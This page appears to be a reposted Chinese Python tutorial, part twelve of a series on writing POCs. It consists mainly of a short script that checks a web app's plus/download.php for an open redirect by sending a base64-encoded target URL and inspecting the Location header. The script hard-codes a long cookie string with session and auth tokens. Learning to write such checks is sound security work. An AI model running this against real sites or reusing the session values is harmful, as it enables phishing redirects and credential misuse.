登录
当前位置: 首页 > 工具软件 > MoMo Auth > 使用案例 >

html+%3ca%3e+id,Python大法之从HELL0 MOMO到编写POC(十二)

牛骞仕
2023-12-01

[Python] 纯文本查看 复制代码# -*- coding: utf-8 -*-

import requests

def POC(url):

headers = {

'Host': 'localhost',

'Cache-Control': 'max-age=0',

'Upgrade-Insecure-Requests':'1',

'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',

'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',

'Accept-Language': 'zh-CN,zh;q=0.8',

'Cookie': '__guid=111872281.1617071225746359600.1514021210290.158; ver=free; passinfo=%E5%85%8D%E8%B4%B9%E7%89%88+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%2Fservice_1.html%22+target%3D%22_blank%22%3E%3Cfont+color%3D%22green%22%3E%28%E8%B4%AD%E4%B9%B0%E6%8E%88%E6%9D%83%29%3C%2Ffont%3E%3C%2Fa%3E; UM_distinctid=160889af2500-062927d1d2a474-5d4e211f-1fa400-160889af251640; CNZZDATA80862620=cnzz_eid%3D600104656-1514116496-%26ntime%3D1514116496; bdshare_firstime=1514120344522; PHPSESSID=93425c5800b892d1625a7e2772e0cc93; AJSTAT_ok_times=1; __tins__4329483=%7B%22sid%22%3A%201514648644160%2C%20%22vd%22%3A%2012%2C%20%22expires%22%3A%201514650918749%7D; __51cke__=; __51laig__=12; CNZZDATA1702264=cnzz_eid%3D481143048-1514986272-%26ntime%3D1514986272; TS4_lang=zh-cn; TS4_TSV4_LOGGED_USER=juVZCAnP1%2F5u%2F08gg%2BV8B3fsJlxLGuip; CNZZDATA1254932726=2083485242-1514986792-http%253A%252F%252Flocalhost%252F%7C1515147524; TS4_TSV4_ACTIVE_TIME=1515152586; ToxD_2132_saltkey=Cy7EYFjC; ToxD_2132_lastvisit=1515217736; ToxD_2132_seccode=2.52b3024ef3cf030111; ToxD_2132_auth=a9d6n%2BIQyXqM8PiyCpPvy3IMoZxhofeEf7OSG0a0ha3YP71Y4GjtOXrUgSX7Fkq%2FEYRz4eD2jrDnDL8jD48T; ToxD_2132_nofavfid=1; ToxD_2132_ulastactivity=bf78u5QlxDtB03kbbeVnmed4IrFbhRildA80nAhmZNbSjbVOc1cc; ToxD_2132_lip=127.0.0.1%2C1515325183; monitor_count=45',

'If-None-Match': '4f94-4ca24c1a3a435',

'If-Modified-Since': 'Thu, 20 Sep 2012 16:38:43 GMT',

'Connection': 'close',

}

attack_url = url + 'plus/download.php?open=1&link=aHR0cDovL2Jicy5pY2h1bnFpdS5jb20%3d'

attack_url_headers = requests.get(attack_url,headers=headers, allow_redirects=False).headers #allow_redirects=False的意义为拒绝默认的301/302重定向从而可以通过attack_url_headers['Location']拿到重定向的URL

if 'bbs.ichunqiu.com' in attack_url_headers['Location']:

print 'Ture'

else:

print 'False'

if __name__ == '__main__':

POC('http://localhost/urlredirectdemo/')

 类似资料:

相关阅读

Python编写二进制HTML是否区分大小写?将数据从html / js返回到python编写Python Music Streamer跟老齐学Python之编写类之一创建实例

相关文章

Bootstrap HTML编码规范十字链表法HTML 标签简写及全称面试十大难题的回答模板蚂蚁十面面经-大数据开发

相关问答

编写器未编写-未找到文件正确编码大写字母编年史队列POC返回意外延迟云编写器grpcio Python包编写超过5000万从Pyspark df到PostgresSQL,最有效的方法

相关文档

Python 编程:从入门到实践十大经典排序算法数据挖掘十大算法Python 从入门到精通编程之法:面试和算法心得
快捷导航: 新手教程 算法原理 架构设计 Java进阶 数据库进阶 大厂专栏 面试经验 编程笔记 编程问答 所有专题 文档资料 工具软件 电子书籍 小牛导航
在线工具: 房贷计算器 个税计算器 Linux命令查询 Json格式化 正则表达式 颜色转换 AES加解密 SHA1加密 MD5加密 毒鸡汤 字数统计 随机密码生成 进制转换 Base64编解码 励志句子
Copyright © 2019-2024 小牛知识库@xnip.cn. All Rights Reserved.